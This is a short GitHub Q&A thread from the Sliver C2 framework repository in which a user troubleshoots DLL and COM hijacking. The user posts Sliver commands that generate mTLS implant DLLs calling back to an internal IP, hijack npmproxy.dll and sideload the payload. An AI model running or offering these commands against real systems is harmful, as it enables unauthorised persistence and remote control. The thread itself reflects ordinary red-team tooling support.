### DISCUSSION TITLE
Generating DLL for COM Hijack

### DISCUSSION THREAD

**Discussion by man715** [BishopFox/sliver#1083] [Q&A]
Hello all. I’m having issues getting any DLL to work for DLL hijacking. I’ve attempted to use the dllhijack command but the payload never calls back. I can get a simple DLL that pops a message box to fire but not any of the DLLs created by sliver. 

Here are the commands I used to generate DLLs for this. 

```
profiles new  --mtls 10.10.11.99:9999 --format shared --os Windows --arch x64 -R dlll
dllhijack --reference-path C:\\Windows\\System32\\npmproxy.dll --reference-file ./nmproxy.dll.orig --profile dlll c:\\tools\\00-Payloads\\nmproxy.dll
```

If I `sideload` this dll it does not work either:
```
sideload -k -e DLLMain /home/man715/nmproxy.dll
```

However, if I sideload a dll generated like below, it works but it will not work when used as a COM object.
```
generate --format shared --mtls 10.10.11.13 --run-at-load
```

Any help is greatly appreciated. Thank you.

**Comment by man715** [comment]
It looks like there may be an issue with the DLL that was generated:
![image](https://user-images.githubusercontent.com/23712890/215529143-ae31b563-c16e-49e3-bc95-1cb4b609f2db.png)

**Reply by 0x73unflower** [reply]
Did you ever figure this out? A custom one using `DllMain` seems to function, just not one generated using Sliver.

**Reply by man715** [reply]
Honestly, I don't recall, and I have not used sliver in a long time. :(
